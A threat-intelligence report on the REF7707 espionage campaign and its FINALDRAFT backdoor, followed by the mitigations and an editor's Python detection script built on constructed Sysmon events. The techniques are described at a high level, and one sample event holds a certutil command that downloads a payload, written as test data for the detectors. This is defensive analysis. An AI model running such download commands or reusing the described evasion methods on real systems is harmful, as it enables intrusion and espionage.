Full Report
Threat hunters have shed light on a new campaign targeting the foreign ministry of an unnamed South American nation with bespoke malware capable of granting remote access to infected hosts. The activity, detected in November 2024, has been attributed by Elastic Security Labs to a threat cluster it tracks as REF7707. Some of the other targets include a telecommunications entity and a university,
Analysis Summary
# Threat Actor: REF7707
## Attribution & Identity
* **Attribution:** Tracked by Elastic Security Labs as **REF7707**.
* **Aliases/Associations:** Associated with the novel intrusion set deploying the FINALDRAFT malware.
## Activity Summary
* **Historical Activities/Campaigns:** Activity detected in November 2024. The campaign is described as a "well-engineered, highly capable, novel intrusion set," though the actors exhibited "poor campaign management and inconsistent evasion practices."
* **Objectives:** Espionage, gaining remote access to infected hosts.
## Tactics, Techniques & Procedures
* **Initial Access:** The initial access vector is not known. The earliest observed activity is the Windows `certutil` utility being used to download secondary payloads from a web server. Those commands ran under the Windows Remote Management remote shell host (`WinrsHost.exe`), which means the operators already held valid credentials and were using WinRM for lateral movement before this point.
* **Execution/Persistence:** The first stage is **PATHLOADER**, a small loader that retrieves encrypted shellcode, decrypts it, and executes it in memory.
* **In-Memory Execution:** The decrypted shellcode is **FINALDRAFT**. Rather than being written to disk, it is injected into a newly spawned `mspaint.exe` process, so the backdoor runs under the name of a benign Windows binary.
* **C2/Exfiltration:** FINALDRAFT uses the **Microsoft Graph API** for command-and-control. It polls the Outlook mailbox's Drafts folder for commands and writes results back as new draft emails, so the only network peer is `graph.microsoft.com` and the traffic blends with legitimate Microsoft 365 use. (Similar Graph-based C2 was observed in the SIESTAGRAPH backdoor.)
* **Capabilities:** FINALDRAFT exposes 37 command handlers, including process injection, file manipulation, and network proxying.
* **Defense Evasion (Windows):** Runs PowerShell without spawning `powershell.exe` by loading the PowerShell engine in-process through **PowerPick**, an open-source "unmanaged PowerShell" component from the Empire project (not a Microsoft utility), and patches ETW logging APIs so the activity is not reported through Event Tracing for Windows.
* **Credential Access:** Can start new processes using stolen NTLM hashes (pass-the-hash), which presupposes credential material already harvested elsewhere on the network.
* **MITRE ATT&CK IDs:** The source text gives no IDs. An editorial mapping of the techniques above (not from the source): T1021.006 (Remote Services: Windows Remote Management), T1105 (Ingress Tool Transfer, via `certutil`), T1055 (Process Injection), T1059.001 (Command and Scripting Interpreter: PowerShell), T1562.006 (Impair Defenses: Indicator Blocking, for the ETW patching), T1550.002 (Use Alternate Authentication Material: Pass the Hash), and T1102.002 (Web Service: Bidirectional Communication, for the Graph API drafts channel).
## Targeting
* **Sectors:** Foreign Ministry, Telecommunications entity, University.
* **Geography:** One target identified as a South American nation's foreign ministry. Other targets are located in Southeast Asia.
* **Victims:** Unnamed South American foreign ministry; unnamed Southeast Asian telco; unnamed Southeast Asian university.
## Tools & Infrastructure
* **Malware Families:**
* PATHLOADER (Initial execution stage)
* FINALDRAFT (Full-featured Remote Administration Tool/Backdoor)
* **Infrastructure:** Secondary payloads were staged on a web server associated with the targeted foreign ministry. C2 relied on the Microsoft Graph API (Outlook Drafts folder) rather than a conventional attacker-operated C2 server.
## Implications
REF7707 is a capable actor with weak operational security. Its use of the Microsoft Graph API for C2, with FINALDRAFT present in both Windows and Linux environments, hides command traffic inside Microsoft 365 connections that most network controls allow by default, which makes it a meaningful espionage risk to government and critical-infrastructure organizations. The pass-the-hash capability and the WinRM-driven activity both indicate that credentials had already been obtained before the observed intrusion began.
## Mitigations
* Alert on child processes of the WinRM remote shell host (`WinrsHost.exe`), especially `cmd.exe`, `certutil.exe`, and other living-off-the-land binaries, and restrict WinRM to designated administrative hosts and accounts.
* Alert on `certutil` invoked with `-urlcache`/`-f` and a URL regardless of the destination; the download server in this campaign was associated with the victim organization itself, so do not exempt internal web servers.
* Monitor Microsoft Graph and Exchange Online audit data for mailbox access and draft creation by unexpected app registrations or clients, and review OAuth consents and application permissions such as `Mail.ReadWrite`.
* Deploy endpoint detection for process injection into benign Windows binaries such as `mspaint.exe` (which has no reason to make network connections or load the PowerShell engine) and for the PowerShell engine (`System.Management.Automation.dll`) being loaded by anything other than a PowerShell host.
* Treat in-memory use of open-source offensive tooling such as PowerPick as a high-confidence indicator, and hunt for tampering with ETW logging functions in process memory.
* Reduce the value of stolen NTLM hashes: enable Credential Guard, place privileged accounts in the Protected Users group, audit and where possible restrict NTLM authentication, and keep local administrator passwords unique (LAPS).
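The process-level tradecraft in the TTP section (WinRM-driven `certutil` downloads, `mspaint.exe` as an injection host, PowerShell run without `powershell.exe`) and the corresponding endpoint mitigations above can be checked with a few host-telemetry rules. The following is an added example written by the editor; it is not Elastic's detection logic and not taken from the REF7707 report. It runs three heuristics over constructed Sysmon-style events (process create, network connect, image load; every host, path and GUID is invented) and returns which rule fired for which process. The set of "expected" parents for `mspaint.exe` is an assumption that would need a site-specific baseline.

```python
"""Host-telemetry heuristics for the REF7707 tradecraft summarised above.
Added example by the editor; not Elastic's rules and not from the report.
Events are constructed in Sysmon's field vocabulary: EventID 1 = process
create, 3 = network connect, 7 = image load. All values are invented."""
import ntpath
import re
from collections import defaultdict

PS_ENGINE = (r"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation"
             r"\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll")

SAMPLE_EVENTS = [
    # Benign: an admin hashes a file with certutil from an interactive cmd.exe.
    {"EventID": 1, "ProcessGuid": "{g1}", "Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -hashfile C:\temp\setup.msi SHA256"},
    # Suspicious: certutil fetching a payload from a web server, spawned by the
    # WinRM remote shell host, i.e. driven remotely with valid credentials.
    {"EventID": 1, "ProcessGuid": "{g2}", "Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\winrshost.exe",
     "CommandLine": r"certutil -urlcache -split -f http://192.0.2.10/p.bin C:\Users\Public\p.bin"},
    # Benign: a user opens Paint from Explorer; no network, no PowerShell engine.
    {"EventID": 1, "ProcessGuid": "{g3}", "Image": r"C:\Windows\System32\mspaint.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "mspaint.exe"},
    # Suspicious: mspaint.exe spawned by an unknown binary, then connecting out and
    # loading the PowerShell engine (injection host + unmanaged PowerShell pattern).
    {"EventID": 1, "ProcessGuid": "{g4}", "Image": r"C:\Windows\System32\mspaint.exe",
     "ParentImage": r"C:\Users\Public\p.bin", "CommandLine": "mspaint.exe"},
    {"EventID": 3, "ProcessGuid": "{g4}", "Image": r"C:\Windows\System32\mspaint.exe",
     "DestinationIp": "198.51.100.7", "DestinationPort": 443},
    {"EventID": 7, "ProcessGuid": "{g4}", "Image": r"C:\Windows\System32\mspaint.exe",
     "ImageLoaded": PS_ENGINE},
    # Benign: powershell.exe itself is expected to load the automation engine.
    {"EventID": 7, "ProcessGuid": "{g5}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ImageLoaded": PS_ENGINE},
]

WINRM_SHELL_HOSTS = {"winrshost.exe", "wsmprovhost.exe"}  # WinRM shell / provider hosts
POWERSHELL_HOSTS = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}
PS_ENGINE_DLLS = {"system.management.automation.dll", "system.management.automation.ni.dll"}
MSPAINT_OK_PARENTS = {"explorer.exe", "svchost.exe"}  # assumed baseline; tune per site
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def _base(path):
    """Lower-cased file name of a Windows path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path or "").lower()


def certutil_download_over_winrm(ev):
    """Rule 1: certutil used as a downloader while parented by a WinRM shell host."""
    if ev.get("EventID") != 1 or _base(ev.get("Image")) != "certutil.exe":
        return None
    cmd = ev.get("CommandLine", "").lower()
    is_download = "urlcache" in cmd and URL_RE.search(cmd) is not None
    if is_download and _base(ev.get("ParentImage")) in WINRM_SHELL_HOSTS:
        return ("certutil_download_over_winrm", ev["ProcessGuid"])
    return None


def unmanaged_powershell(ev):
    """Rule 2: the PowerShell engine DLL loaded by a process that is not a PowerShell host."""
    if ev.get("EventID") != 7 or _base(ev.get("ImageLoaded")) not in PS_ENGINE_DLLS:
        return None
    if _base(ev.get("Image")) in POWERSHELL_HOSTS:
        return None
    return ("unmanaged_powershell", ev["ProcessGuid"])


def mspaint_misuse(events):
    """Rule 3 (correlated per ProcessGuid): mspaint.exe with an unexpected parent
    or with any outbound network connection. Paint should do neither."""
    per_process = defaultdict(list)
    for ev in events:
        if _base(ev.get("Image")) == "mspaint.exe":
            per_process[ev["ProcessGuid"]].append(ev)
    findings = []
    for guid, evs in per_process.items():
        odd_parent = any(e["EventID"] == 1 and _base(e.get("ParentImage")) not in MSPAINT_OK_PARENTS
                         for e in evs)
        talks_out = any(e["EventID"] == 3 for e in evs)
        if odd_parent or talks_out:
            findings.append(("mspaint_misuse", guid))
    return findings


def detect(events):
    """Run all rules; returns a list of (rule_name, ProcessGuid) findings."""
    findings = []
    for ev in events:
        for rule in (certutil_download_over_winrm, unmanaged_powershell):
            hit = rule(ev)
            if hit:
                findings.append(hit)
    findings.extend(mspaint_misuse(events))
    return findings


if __name__ == "__main__":
    for rule, guid in detect(SAMPLE_EVENTS):
        print(f"{rule:30s} process {guid}")
```

On the sample data only the two suspicious processes fire: the WinRM-parented `certutil` download, and the `mspaint.exe` instance that both has an odd parent and makes a network connection and loads the PowerShell engine. In an Elastic deployment the same three rules map directly onto EQL `process where`, `library where` and `network where` queries; the parent baseline for `mspaint.exe` and the WinRM host list are the parts to tune, and rule 1 can be relaxed to flag any `certutil` URL download if WinRM-parented hits are too narrow for your estate.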